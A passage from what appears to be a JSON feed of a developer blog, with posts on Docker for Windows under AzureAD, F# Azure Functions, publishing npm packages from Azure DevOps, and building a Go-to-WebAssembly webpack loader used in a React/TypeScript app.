😉\n", "id": "2019-03-14-pretty-javascript-console" }, { "title": "Docker for Windows AzureAD and Shared Drives", "url": "https://www.aaron-powell.com/posts/2019-03-07-docker-for-windows-azuread-shared-drives/", "date": "Thu, 07 Mar 2019 09:03:55 +1100", "tags": [ "docker" ], "description": "How to share drives when using AzureAD to log into Windows", "content": "Now that I work for Microsoft I have a device that I sign in using Azure Active Directory (AzureAD or OrgID) rather than the Microsoft Account (MSA) that I use to use.\nWhen setting up a new device I went to share my disk to Docker for Windows so I can mount volumes. Unfortunately there is a bug in Docker for Windows with authentication using AzureAD.\nEveryone’s solution seems to be to create a local admin account, which I find unappealing. A local account means it’s not sync’ed anywhere and I run the risk of losing stuff when I format a device.\nMy solution? Add my MSA to the device and set it as an administrator level account. A quick login using that account, then a log straight back out (I don’t intend to use that account anyway) and back to my AzureAD login. Now I can share the volume, enter my MSA credentials, and we are done!\nSo next time I’m setting up a device to use AzureAD as the login I’ll also add my MSA as an admin just so I can share a volume to Docker. Seems overkill, but 🤷‍♂, you gotta do what you gotta do.\n", "id": "2019-03-07-docker-for-windows-azuread-shared-drives" }, { "title": "Azure Functions With F#", "url": "https://www.aaron-powell.com/posts/2019-03-05-azure-functions-with-fsharp/", "date": "Tue, 05 Mar 2019 14:24:36 +1100", "tags": [ "fsharp", "serverless", "azure-functions" ], "description": "How to create an Azure Function using F#", "content": "I’m starting to work on a new project in which I’m going to use Azure Functions v2 for a simple API backend.\nAzure Functions support a number of different languages such as Java, Python (in preview at time of writing), TypeScript (and naturally JavaScript) and of course C#. So with all those to pick from what would I want to choose?\nWell, naturally I decided to go with F#, which kind of worked in v1. And after all, it’s a CLR language so there’s no reason it shouldn’t work in v2 like C# does.\nBut unfortunately there’s no templates available, so getting started seems to be a bit trickier.\nCreating an F# Functions Application To create a F# Functions Application the easiest approach is to follow the Visual Studio Code instructions to get the extensions installed.\nOnce VS Code is ready to go we’ll create a new New Functions Project choosing C# as the language.\nNow comes the tricky part, rename your csproj file to fsproj and add a reference to FSharp.Core.\nAnd you’re done!\nOk, it wasn’t really that tricky was it! Since it’s all on the CLR and it’s a .NET Core application the dotnet cli tools will just work! You’ll even get debugging support from within VS Code of your F# Functions.\nNow you’re ready to create a function with F#!\nHere’s a basic HTTP trigger:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 module HttpTrigger open Microsoft.Azure.WebJobs open Microsoft.AspNetCore.Mvc open Microsoft.Azure.WebJobs.Extensions.Http open Microsoft.AspNetCore.Http open System.IO open System.Text [<FunctionName("HttpTrigger")>] let httpTriggerFunction ([<HttpTrigger(AuthorizationLevel.Function, "post", Route = null)>] req : HttpRequest) = async { use reader = new StreamReader(req.Body, Encoding.UTF8) let! 
body = reader.ReadToEndAsync() |> Async.AwaitTask return OkObjectResult body } |> Async.StartAsTask Be aware that if you’re doing anything with async you’ll need to convert it to Task<'T> for the return as the Functions host expects the C# Task API for async, not F#’s Async workflows 😦.\nCaveat’s There’s a minor caveat to this whole thing, because the VS Code extension doesn’t understand F# you can’t use it to add new functions to your project, you have to manually do it, and you then have to know what NuGet packages that you require are going to be. I find it easy enough to just have another VS Code window open and create a C# one if I need to look up types and their packages.\nYou’ll also find that the .vscode/settings.json file contains "azureFunctions.projectLanguage": "C#". You can change that to F# if you want, but it’ll give you a warning because the extension doesn’t understand it. I leave it as C# because it doesn’t bother me.\nConclusion While the tooling might not be there, creating an Azure Function with F# really isn’t that big a deal.\n", "id": "2019-03-05-azure-functions-with-fsharp" }, { "title": "Releasing to npm From Azure DevOps", "url": "https://www.aaron-powell.com/posts/2019-02-18-releasing-to-npm-from-azure-devops/", "date": "Mon, 18 Feb 2019 09:16:17 +1100", "tags": [ "javascript", "azure-devops" ], "description": "How to setup CI/CD with Azure DevOps to deploy npm packages", "content": "In my recent article about creating a webpack loader to generate WebAssembly with Go I decided I wanted to be able to easily release the loader to npm as I was building it.\nTo do this I decided that I was going to use Azure DevOps as it gives me a nice separation between the build phase and the release phase. Also, a lot of people are unaware that Azure DevOps pipelines are free for open source projects, so again there’s a nice little bonus that we can leverage for our project.\nCreating a build The first step you need to do is create a build definition. We’ll do that by installing the Azure Pipelines GitHub application (if you haven’t already installed it) and activate it for our GitHub repository.\nWhen linking them we’ll authorise Azure DevOps to have access to our GitHub information and create a pipeline using the Node.js template definition as the base, but we’re going to customise it a bit before saving it.\nThe Node.js template looks like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 trigger: - master pool: vmImage: 'Ubuntu-16.04' steps: - task: NodeTool@0 inputs: versionSpec: '10.x' displayName: 'Install Node.js' - script: | npm install npm run build displayName: 'npm install and build' It’s stating that this build is triggered on the master branch, so PR’s won’t trigger this one (we could always trigger a different build for PR’s). Next it’s telling us that the build agents will be in the pool of Linux hosted agents, in particular Ubuntu 16.04 is the distro that will be used.\nNow we’re into the tasks the agent will run, first up is a task to install Node.js at the version you request. It’ll default to the latest LTS, but you can tweak that if you want to do version pinning or anything, just change the versionSpec property. Lastly we run a script task which will just execute a script in the shell of the agent (in this case, a Linux script, but it’s a Windows script if it was a Windows agent) that runs npm install and npm run build. It’s made an assumption that you’ve got a npm script called build that will do the build, so you can tweak that if you want. 
In fact you can do whatever changes you need, but this is simple for most scenarios. Also, depending on your preference for task roles you could split the install and build steps into separate tasks, that can make it easier to debug a failure if one is hit, rather than having to read the logs.\nIf you choose Save and Run it will offer to create an azure-pipelines.yaml file in your GitHub repository, either directly in master or in a branch to PR in, so pick your preferred approach, then our build will kick off and should complete successfully.\nSo how do we release something?\nGetting artifacts for release Our build will run on an agent, generate the stuff we wanted generate (in my case, converted TypeScript to JavaScript) but that only lived on that agent and when the agent is done it’s destroyed. Well that’s not very useful now is it, we want stuff off there to push to npm.\nTo do that we’ll edit our azure-pipelines.yaml file. First let’s generate a npm package that we can publish:\n1 2 3 - script: | npm pack displayName: 'Package for npm release' Again we’re using the script task to do this and we run the npm pack command which generates us a tgz file that can be sent to the npm package repository (or any other that you so desire). But why are we generating a package and not publishing? Well the reason is that we want to split the build phase of our pipeline from the release phase, so Continuous Integration then Continuous Delivery. Doing a release from our build step kind of muddies the waters on what’s responsible for what. Also, by generating the tgz file in the build we’re saying that this is what’ll be released and it can’t be changed, so if we had a staging npm repository we could push it to there, like we can do staging sites for applications. Ultimately, it makes the released artifact more immutable.\nWe’ve now generated a tgz file, next we need to attach it as an artifact to the build. An artifact is the output of a build that can be picked up elsewhere, either by a chained build, by a release, or just manually looking at the build results.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 - task: CopyFiles@2 inputs: sourceFolder: '$(Build.SourcesDirectory)' contents: '*.tgz' targetFolder: $(Build.ArtifactStagingDirectory)/npm displayName: 'Copy npm package' - task: CopyFiles@2 inputs: sourceFolder: '$(Build.SourcesDirectory)' contents: 'package.json' targetFolder: $(Build.ArtifactStagingDirectory)/npm displayName: 'Copy package.json' - task: PublishBuildArtifacts@1 inputs: pathtoPublish: '$(Build.ArtifactStagingDirectory)/npm' artifactName: npm displayName: 'Publish npm artifact' Using the Copy Files task we can get the files (our tgz and our package.json) and copy them across to the artifacts staging location defined by the variable $(Build.ArtifactStagingDirectory). This is a special directory that the agent has that’s intended to by published as artifacts. Once these files are in the right place we use the Publish Artifacts task to tell our build the files in the folder will be in a named artifact of npm. This name is important as we’ll use it in the future to access them, so make it something logical. 
I’ll also avoid using spaces in the name of the artifact so that you don’t have to do escaping when you try and use them.\nI’ll also copy across the release notes as well as the JavaScript files we generate from the TypeScript compiler as these can be useful for debugging.\nWhen it’s all said and done our build definition now looks like this and you can see its run history here.\nCreating a release Our build is passing, we’re getting artifacts output, it’s time we publish to npm.\nRight now the only way to create a release pipeline is using the designer in Azure Pipeline, there’s no YAML export, but it’s a good thing that we have a simple release pipeline then!\nWithin the Azure DevOps portal we’ll create a new release, use the Empty Job template and name our release stage (I’ve called it Publish).\nNow we need to define what the stages that our release will go through. A stage can represent an environment, so if you are releasing to UAT then Pre Prod and finally Production you’d have them all mapped out in the build. You can also define gates on each stage, whether there are approvers of a stage release, etc. but all of that is beyond what we need here, we’ve only got one stage, that’s releasing to npm. Check out the docs for more info on Stages.\nConveniently there’s a npm task provided by Azure DevOps that has some common commands defined, including the one we want, publish! Specify the path to our linked artifact named npm (which we named above) and choose to publish to an External npm registry (we use that because Azure DevOps can act as a npm registry).\nIf you haven’t done so previously you’ll need to create a service connection to the npm registry, use the New button for that and enter https://registry.npmjs.org as the source and a token that you can generate from the npm website under your profile.\nNow you’d think we’d be ready to roll right? Well… yes you do publish to npm but what you publish is a package that contains your tgz, not your tgz. You see, the publish command is capable of taking a tgz and publishing that to npm but there’s a bug in the Azure DevOps task that means it doesn’t work. So unfortunately we’ll need a workaround 😦.\nThankfully the workaround is pretty simple, we need to unpack the tgz file and use the publish task against its contents. We do that with the Extract Files task, specifing *.tgz as what we’ll extract (since we don’t know the filename) and give if a new folder. I used $(System.DefaultWorkingDirectory)/npm-publish. Now we can update our publish command to not use the artifact directory, but the unpacked directory, which in my case is $(System.DefaultWorkingDirectory)/npm-publish/package.\nWith our stage complete it’s time to link it to the build definition. We do that by adding an artifact, selecting the build pipeline we created and leaving the defaults.\nNote: I leave the Default Version as Specify at time of release creation as that gives the build control over the artifacts going in. For this scenario it doesn’t make a huge difference, but it can be useful in more complex setups.\nBecause we want a release to go out every time a build completes we’ll click the lightning bolt (⚡) on the artifact and enable the Continuous deployment trigger. Without this we’d need to manually trigger a release. If you had certain branches that shouldn’t ever cut a release (eg: gh-pages) then you can add a filter for them from here too.\nSave, run, boom! Releases happening to npm on push to master. 
Just remember, you’ll always have to update your package.json to have a new version number, else it’ll fail to publish to npm, since you can’t publish an existing release.\nAdding badges The last thing you want to do is add a badge to your readme to show off the awesome pipeline work. We can do that from the Build -> menu in the top-right corner and select ‘Status Badge’ and get some markdown like this:\n1 [![Build Status](https://dev.azure.com/aaronpowell/webpack-golang-wasm-async-loader/_apis/build/status/aaronpowell.webpack-golang-wasm-async-loader?branchName=master)](https://dev.azure.com/aaronpowell/webpack-golang-wasm-async-loader/_build/latest?definitionId=16&branchName=master) And it looks like this:\nCustomising the label I only recently found out that you can customise the text int he label for the Azure Pipelines badge. To do that add a query string to the image of label=<something cool>. It can even support an emoji 😉!\n1 [![Build Status](https://dev.azure.com/aaronpowell/webpack-golang-wasm-async-loader/_apis/build/status/aaronpowell.webpack-golang-wasm-async-loader?branchName=master&label=🚢 it)](https://dev.azure.com/aaronpowell/webpack-golang-wasm-async-loader/_build/latest?definitionId=16&branchName=master) ![Build Status](https://dev.azure.com/aaronpowell/webpack-golang-wasm-async-loader/_apis/build/status/aaronpowell.webpack-golang-wasm-async-loader?branchName=master&label=🚢 it)\nBonus round, releasing to GitHub Releasing to npm is good and all, but what if we wanted to also publish the release to GitHub, tag the commit correctly and ensure that anyone who just wants to get the raw files can get them?\nWell that we can also do with Azure DevOps!\nFirst we’re going to need to grab the version number of our release so that we can tag it appropriately on GitHub. I’ll use the Bash task (since I know I’m using a Linux agent) and just run an inline script:\n1 2 v=`node -p "const p = require('./package.json'); p.version;"` echo "##vso[task.setvariable variable=packageVersion]$v" I’m running a little inline Node.js script to get the version number from the package.json file that we attached as an artifact (so I set the working directory to $(System.DefaultWorkingDirectory)/aaronpowell.webpack-golang-wasm-async-loader/npm), alternatively, you could grab it from the unpacked tgz file (but I started this before I realised that I’d have to do that 😛). Next we use echo to create an Azure DevOps variable named packageVersion.\nThen we’ll use the GitHub Release task (which is in preview at time of writing) to generate our release.\nI choose what GitHub account I’ll publish under and the repository to release to (both show be available in the drop down lists), we’ll use Create for the action (it’s a new release after all) the Target is $(Build.SourceVersion) as that is the SHA of the commit the build was triggered for and that we want to tag, use our variable $(packageVersion) as the Tag with a Tag Source of User specified tag and then set the assets to the artifacts we want published (I publish the tgz and the generated JavaScript). I also chose to add Release Notes which I write into a file called ReleaseNotes.md in the git repo and publish as an artifact.\nNow when we create a release it not only goes to npm but it also goes to GitHub as a release, tags the commit and links the commits included in the release. Check it out here.\nConclusion And that is how we can do automated build and release of packages to npm and GitHub Releases from Azure DevOps. 
It really is quite simple!\nCommentary on 2FA for Publish My colleague Tierney Cyren pointed out that the above will not work if you’re using 2FA on Publish within npm. One possible workaround would be to have a manual gate on the release where you have to enter the OTP code as a variable before running the release and passing it as the CLI flag on publish. Otherwise, you’ll have an error such as this one in your release.\n", "id": "2019-02-18-releasing-to-npm-from-azure-devops" }, { "title": "Learning Golang through WebAssembly - Part 6, Go, WASM, TypeScript and React", "url": "https://www.aaron-powell.com/posts/2019-02-12-golang-wasm-6-typescript-react/", "date": "Tue, 12 Feb 2019 09:00:06 +1100", "tags": [ "golang", "wasm", "javascript", "webpack", "typescript", "react" ], "description": "Time to put all the pieces together and get something built!", "content": "Building an Application Welcome to the final article in our little series, congratulations, you’ve made it this far!\nSo far we’ve looked at a lot of little pieces which would eventually make an application and it’s time to tackle that, it’s time to build a web application.\nI’ve decided that for this application we’re going to piece together some other tools that you might commonly use, we’ll use React as a UI library and TypeScript as a compile-to-JavaScript language. But there’s no reason you couldn’t replace React with Vue, Angular or any other UI library, and drop TypeScript for ‘plain old JavaScript’. You’ll find the demo app on my GitHub.\nSetting up our Application To get started we’ll use create-react-app with TypeScript, I won’t go over doing that setup, the React documentation does a good job for me. You don’t have to use create-react-app, it’s just a really easy way to bootstrap, but if you’re confident without it, by all means skip this step.\nOnce you’re created an application though we’ll need to eject create-react-app because we need to be able to modify the webpack.config.js file, which can only be done if you eject create-react-app.\nGetting all WASM-y We’ll start by adding the loader created in the last post using npm or yarn:\n1 2 3 npm install --save-dev golang-wasm-async-loader # or yarn add golang-wasm-async-loader Then editing the configs/webpack.config.js file to add our loader (follow the instructions in the file for where to put it):\n1 2 3 4 { test: /\\.go$/, loader: 'golang-wasm-async-loader' }, Adding our WASM I’m going to make a little application that shows at least 2 number input fields and adds all the values together to get a sum, to Go code for it will look like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 package main import ( "strconv" "syscall/js" "github.com/aaronpowell/webpack-golang-wasm-async-loader/gobridge" ) func add(i ...js.Value) js.Value { ret := 0 for _, item := range i { val, _ := strconv.Atoi(item.String()) ret += val } return js.ValueOf(ret) } func main() { c := make(chan struct{}, 0) println("Web Assembly is ready") gobridge.RegisterCallback("add", add) <-c } Pretty basic, we use range to go over the spread of js.Value, convert each one from a string to a number, sum them up and return boxed in js.Value.\nNext up in our input field, I’ve created a file NumberInput.tsx for that:\n1 2 3 4 5 6 7 8 9 10 11 12 import * as React from 'react'; export interface NumberInputProps { value: number onChange: (value: number) => void } const NumberInput : React.SFC<NumberInputProps> = ({ value, onChange }) => ( <input type="number" value={value} onChange={(e) 
=> onChange(parseInt(e.target.value, 10))} /> ); export default NumberInput; It’s a stateless component that receives two properties, a value for the input field and the callback to execute on change of the input field.\nLastly we’ll make our <App />:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 import * as React from 'react'; import wasm from './main.go'; import NumberInput from './NumberInput'; const { add } = wasm; interface State { value: number[] result: string } class App extends React.Component<{}, State> { constructor(props: {}) { super(props); this.state = { value: [0, 0], result: '0' }; } async updateValue(index: number, value: number) { //todo } render() { return ( <div> <p>Enter a number in the box below, on change it will add all the numbers together. Click the button to add more input boxes.</p> {this.state.value.map((value, index) => <NumberInput key={index} value={value} onChange={i => this.updateValue(index, i)} /> )} <button type="button" onClick={() => this.setState({ value: [...this.state.value, 0]})}>More inputs!</button> <p>Value now is {this.state.result}</p> </div> ); } } export default App; Ok, pretty basic, it’s component with state (sorry, no redux or hooks here 😝) where state contains an array of input values and the current sum. The render will loop over the input values, create our <NumberInput /> component with the value and give it a function that will call updateValue when done. State it initialised to have 2 inputs, but you can add more with a button shown on screen.\nAt the top of the file you’ll see that we’re importing the main.go file from above and using destructing assignment to get out the add function, or more accurately, a reference to it from the Proxy the loader creates for us.\nNow it’s time to complete our updateValue method. But it turns out that using the add function could be a bit tricky. Sure we can define it as an any property of the WASM, but what if we wanted to be more intelligent in the way it is represented?\n1 2 3 4 5 6 async updateValue(index: number, value: number) { let newValues = this.state.value.slice(); newValues[index] = value let result = await add<number, string>(...newValues); this.setState({ value: newValues, result }); } Using Types with our Proxy How do we make sure that TypeScript knows what type our arguments are that are to be passed into a function that, well, doesn’t exist? Ultimately we want to get away from an any, instead we want to use TypeScript generics!\nWe can do this in one of two ways, the first is we just create a definition file that creates an explicit interface for our WASM import:\n1 2 3 4 5 6 7 8 declare module "*.go" { interface GoWrapper { add: (...params: number[]) => Promise<string> } var _: GoWrapper export default _ } I’ve created a file called definitions.d.ts that sits alongside the App.tsx file, and by declaring the module for *.go it means that this declaration file works for any imports of Go files. 
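For reference, this is roughly what the call site in App.tsx ends up looking like once that declaration file is in place (a sketch based on the demo app above — add and './main.go' are the ones we've already set up, the sum wrapper is just for illustration):

import wasm from './main.go';

const { add } = wasm;

async function sum(values: number[]): Promise<string> {
  // definitions.d.ts types add as (...params: number[]) => Promise<string>,
  // so there's nothing extra to annotate here.
  return await add(...values);
}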
We can also drop the generic arguments, which is nice, but it becomes a problem if we want to start adding more Go functions, we keep having to edit this file to include them.\nSo how about going crazy with generics!\n1 2 3 4 5 6 7 8 declare module "*.go" { interface GoWrapper { [K: string]: <T = any, R = any>(...params: T[]) => Promise<R> } var _: GoWrapper export default _ } Now, stick with me as we break it down:\nWe’re saying we have keys of the type (GoWrapper) that are strings with [K: string] Each key has a type that takes two generic arguments, an input and an output, that’s <T = any, R = any> These go into a function with T being a params array, denoted by (...params: T[]) The return type is a Promise using the specified return type, Promise<R> So when we do add<number, string> it says that we’re passing in an indeterminate number of arguments that are all numbers and it’ll return a string asynchronously.\nThis forces the types to flow down from our state and back, all through the magic of TypeScript types!\nIf you were working with mixed types in the arguments to the function we could do something like:\n1 let result = await something<string | number, string>("hello", 1, "world"); Using the | tells TypeScript that the arguments into the function are a string or number type, but not function, boolean, etc. Pretty crazy, right?\nDeploying our Application We’re done! It works locally! Now it’s time to deploy it somewhere.\nI’m going to use Azure DevOps Pipelines to build and then deploy it as an Azure Blob Static Website.\nBuilding To build you’ll need to run the following steps:\nInstall our Go dependencies Install our npm packages Run webpack Copy the required files as a build artifact I’ve created an Azure DevOps YAML build that is in the GitHub repo. It’s modeled on the standard Node.js pipeline but I’ve added the specific Go steps.\nThe things of note are that you’ll need to install the appropriate Go packages with go get. To use the gobridge I created for the loader you’ll need to set the GOOS and GOARCH too:\n1 2 3 - script: | GOOS=js GOARCH=wasm go get "github.com/aaronpowell/webpack-golang-wasm-async-loader/gobridge" displayName: 'install gobridge' You’ll also need to make sure that GOPATH and GOROOT are environment variables available to the loader. By default these aren’t set as environment variables in the agent, I just did it inline:\n1 2 3 4 - script: | npm install GOPATH=$(go env GOPATH) GOROOT=$(go env GOROOT) npm run build displayName: 'npm install, run webpack' Alternatively, you can create them for all tasks:\n1 2 3 4 variables: GOBIN: '$(GOPATH)/bin' # Go binaries path GOROOT: '/usr/local/go1.11' # Go installation path GOPATH: '$(system.defaultWorkingDirectory)/gopath' # Go workspace path Here’s a completed build! (ignore all the failed ones before it 😆)\nRelease At the time of writing we don’t have support for releases in the YAML file for Azure DevOps Pipelines. I use the Azure File Copy task to copy all the files into the storage account I’m running in, followed by the Azure CLI task to set the WASM content type on the WASM file, otherwise it won’t be served correctly:\n1 az storage blob update --container-name "$web" --name "hello.wasm" --content-type "application/wasm" --account-name gowasm Remember to change hello.wasm to whatever your filename is! 😉\nHere’s a completed release!\nConclusion And we are done folks!
Starting with no idea what WebAssembly is or how to write Go we’ve gone through a bunch of exploration into how it all works, what makes Go’s approach to WebAssembly a little tricky as a web developer and ultimately how we can introduce Go into the tool chain that we are familiar with these days building web applications.\nI do hope you’ve enjoyed this series as we’ve gone along. If you build anything exciting with Go and WASM please let me know!\n", "id": "2019-02-12-golang-wasm-6-typescript-react" }, { "title": "Learning Golang through WebAssembly - Part 5, Compiling With Webpack", "url": "https://www.aaron-powell.com/posts/2019-02-08-golang-wasm-5-compiling-with-webpack/", "date": "Fri, 08 Feb 2019 09:00:06 +1100", "tags": [ "golang", "wasm", "javascript", "webpack" ], "description": "It's time to bring this into a web devs toolchain", "content": "Bringing in a Web Devs Tool Chain Up until now we’ve been writing our Go code and then using the go build command to generate our WebAssembly bundle, and sure, this works fine, does what we need it to do, but it doesn’t really fit with how we web developers would be approaching it.\nWe web developers are not shy of using a compiler step, or at least a build task, whether you’re converting from one language to another using TypeScript/Fable/Flow/etc., down-leveling ESNext to ESNow or just doing bundling and minifying of multiple scripts into one, it’s rare to find a JavaScript application these days that isn’t using a tool like gulp, rollup, parcel or webpack.\nI prefer webpack so I decided to look at incorporating it into my process by writing a custom Loader.\nA Quick Intro to webpack If you’re unfamiliar with webpack you really should check out their docs as I won’t do it justice here. Instead I want to focus on the core part of webpack that we need to leverage and how it works.\nBecause webpack is designed to be a generic module bundler it doesn’t understand how to deal with different languages, whether that’s JSX in React, TypeScript or in our case Go. For that we need to bring in a Loader. A Loader is essentially a JavaScript function that takes the contents of the file you’re “loading” and expects you to return some JavaScript that can be run in the generated bundle.\nThis means that in our JavaScript file we can write the following:\n1 import foo from './bar.go'; And tell webpack to use the right loader when it finds a *.go file so it can generate what we need.\nUltimately, our goal is to be able to write something like this:\n1 2 3 4 5 6 7 8 import wasm from './main.go'; async function init() { let result = await wasm.printMessage('Hello from Go, via WASM, using webpack'); console.log(result); } init(); Now let’s look at how we achieve this.\nCreating a Loader TL;DR: If you don’t really want to see the process you can just check out the source code for the loader and install it into your own project.\nAs I mentioned above, the loader that we create is just a JavaScript function that receives the contents of the file we’re loading passed into it, meaning we’ll get our raw Go code, which is not particularly helpful because we need to pass the file path to go build, not the file contents.\nBut never fear, the loader has a Loader API that we can leverage, and the first thing we want to get is resourcePath, which gives us the full path to the file.
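To make that concrete before the Go-specific bits arrive, a bare-bones async loader that only grabs the path might look something like this (a sketch using the same webpack typings as the full loader below; the export default string is just a placeholder):

import * as webpack from "webpack";

function loader(this: webpack.loader.LoaderContext, contents: string) {
  const callback = this.async();       // tell webpack we'll finish asynchronously
  const filePath = this.resourcePath;  // full path to the imported .go file

  // ...this is where we'll hand filePath over to `go build`...
  callback(null, `export default ${JSON.stringify(filePath)};`);
}

export default loader;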
Fantastic, now we are able to send that over to go build!\nGenerating WASM in our Loader We’re going to need to execute go build in our loader, and to do that we can use child_process to spawn it.\nBut before that we’ll need to find the path to the go binary and for that we’ll use the GOROOT environment variable (that we learnt about in the first post).\nFinally we’re going to use execFile which is asynchronous, and we’ll have to tell webpack that this loader is async.\nOur loader is starting to look like this (note: I’ve chosen to write this with TypeScript rather than plain ol’ JavaScript):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 import * as webpack from "webpack"; import { execFile } from "child_process"; const getGoBin = (root: string) => `${root}/bin/go`; function loader(this: webpack.loader.LoaderContext, contents: string) { const cb = this.async(); const opts = { env: { GOPATH: process.env.GOPATH, GOROOT: process.env.GOROOT, GOOS: "js", GOARCH: "wasm" } }; const goBin = getGoBin(opts.env.GOROOT); const outFile = `${this.resourcePath}.wasm`; const args = ["build", "-o", outFile, this.resourcePath]; execFile(goBin, args, opts, (err) => { //todo }); } export default loader; I’m also creating the environment variables (in opts) that sets the appropriate GOOS and GOARCH for WASM.\nFor the file that we generate, I’ll just append .wasm to the end of the resource that we’re processing. This means that we should be fine writing to disk, but some error handling on the writability of the disk could be useful…\nGenerating JavaScript for webpack We’re successfully generating our WASM file but it’s a) dropped in what’s likely our src folder, not where the rest of the webpack bundles will go and b) we still have to write a bunch of code to use it.\nFor our objective of it being just like any other piece of JavaScript we’ll want to generate something to give back to webpack. But what will we need to generate?\nIf we think about it there are two things we need in JavaScript to use a Go WASM binary:\nwasm_exec.js The WebAssembly loader Well I think this is something that webpack should do for us, we don’t want to have to write that code ourselves!\nWe’re going to build up a large string template to send back to webpack, starting with the bootstrapper for WebAssembly:\n1 2 3 4 5 6 async function init() { const go = new Go(); let result = await WebAssembly.instantiateStreaming(fetch(...), go.importObject); go.run(result.instance); } init(); This code will be inserted into our bundle and used when we import wasm from './main.go', but that only starts up the WASM runtime, what about accessing the stuff we registered?\nI decided that I want to enforce the callback pattern from the last post, and that means we’ll need to return something, but what the heck should we return? We’ve got no idea what the names of the functions from Go will be, so how do we know what to return to the import statement?!\nJavaScript Proxies to the Rescue If you’ve ever done programming with Ruby you may have come across the method_missing method on BasicObject which you can use to do metaprogramming. 
In C# you can do a similar thing with the DLR.\nBut if you haven’t come across this, basically it’s a special function that gets executed on an object when there are no members of it that match, a last ditch attempt to handle an error before it is thrown.\nUnfortunately, JavaScript doesn’t have such a method, but we do have Proxy.\nA Proxy is a wrapper around an object that allows you to do interception of standard JavaScript operations, get, set, etc. and with this we can simulate the method_missing from Ruby.\nHere’s a basic example:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 let base = { foo: () => 'foo' }; let baseProxy = new Proxy(base, { get: (target, prop) => { console.log(`captured call to ${prop}`); if (target[prop]) { return target[prop]; } return () => 'method_missing'; } }); console.log(baseProxy.foo()); console.log(baseProxy.bar()); And we’ll see:\n> "captured call to foo" > "foo" > "captured call to bar" > "method_missing" So we can capture all calls and do something with them before, after or completely replace them.\nAnd we’re going to use that to wrap WASM with our callback pattern:\n1 2 3 4 5 6 7 8 9 10 11 12 13 let proxy = new Proxy( {}, { get: (_, key) => { return (...args) => { return new Promise((resolve, reject) => { let cb = (err, ...msg) => (err ? reject(err) : resolve(...msg)); window[key].apply(undefined, [...args, cb]); }; }; } } ); Because we register stuff on the global object our proxy is actually of a blank object, since we don’t really want to proxy window, and anyway we can just ignore the target that the proxy receives anyway.\nPutting it all together It’s time to put together our template that we’ll give back to webpack, and that will be executed when you import a Go file:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 const proxyBuilder = (filename: string) => ` let ready = false; const bridge = self || window || global; async function init() { const go = new Go(); let result = await WebAssembly.instantiateStreaming(fetch("${filename}"), go.importObject); go.run(result.instance); ready = true; } function sleep() { return new Promise(requestAnimationFrame); } init(); let proxy = new Proxy( {}, { get: (_, key) => { return (...args) => { return new Promise(async (resolve, reject) => { let run = () => { let cb = (err, ...msg) => (err ? reject(err) : resolve(...msg)); bridge[key].apply(undefined, [...args, cb]); }; while (!ready) { await sleep(); } if (!(key in bridge)) { reject(\\`There is nothing defined with the name "$\\{key\\}"\\`); return; } if (typeof bridge[key] !== 'function') { resolve(bridge[key]); return; } run(); }); }; } } ); export default proxy;`; Ok, it’s a little more advanced that the few snippets above, but let me explain some of the additions:\nSince we are asynchronously loading the WASM file using fetch there is the possibility that we’d try and use an exported function before it’s been made available. 
This would most likely happen if you have a large bundle and/or a slow network connection, so I’ve introduced a sleep function which uses requestAnimationFrame as a sleeper (so chucking stuff in the event loop) and waiting until the WASM initialization function completes and sets ready to true I’ve aliased the global that we’re working with so you can use the generated code in Node.js or a browser I’m not exposing it as a callback pattern, instead I’m exposing it as a Promise, meaning you can async/await with it I added some error handling, if you call a function that can’t be found the Promise is rejected It also supports setting values not just functions from Go Finishing our Loader Template? ✔\nGenerating WASM file? ✔\nTime to combine all of this together so that we can actually run the Loader.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 function loader(this: webpack.loader.LoaderContext, contents: string) { // omitted for brevity execFile(goBin, args, opts, (_, err) => { if (err) { cb(new Error(err)); return; } let out = readFileSync(outFile); unlinkSync(outFile); const emittedFilename = basename(this.resourcePath, ".go") + ".wasm"; this.emitFile(emittedFilename, out, null); cb( null, [ "require('!", join(__dirname, "..", "lib", "wasm_exec.js"), "');", proxyBuilder(emittedFilename) ].join("") ); }); } Remember how we generated the WASM file into the same location on disk as the original .go file? Well that’s fine to output as go build requires, but we actually want it to go with the rest of the webpack output. To do this we use the emitFile method on the loader context, providing it the contents of the file as a Buffer. That’s why I use readFileSync to get the file into memory, then I unlinkSync to delete it from disk, since the original output isn’t needed anymore.\nFinally I generate a require statement to the wasm_exec.js file that is bundled with the loader (I had to make a minor change to it so it worked with webpack). You’ll see this message in the debugging console:\n../lib/wasm_exec.js 9:19-26 Critical dependency: require function is used in a way in which dependencies cannot be statically extracted This is because the wasm_exec.js file is being added as a require statement to webpack but we’re not explicitly exporting anything from it (since it just augments the global scope), meaning webpack is unsure what we’re actually using in there and it can’t undertake tree shaking to remove unneeded code (and thus optimise the application).\nConclusion All the code for the loader is on GitHub and I’ve published the loader on npm as golang-wasm-async-loader. GitHub contains a (works on my machine) example of it in action if you’d like to try it out.\nBonus Round: Ditching Globals and Improving the Go Experience The astute observer among you will have looked at the source code published to GitHub and noticed it’s not quite what I posted above.\nOne thing that’s constantly irked me with the stuff I’d read from Go on how to work with WASM is that everything seems to use js.Global as a dumping place for their functions/values/etc. 
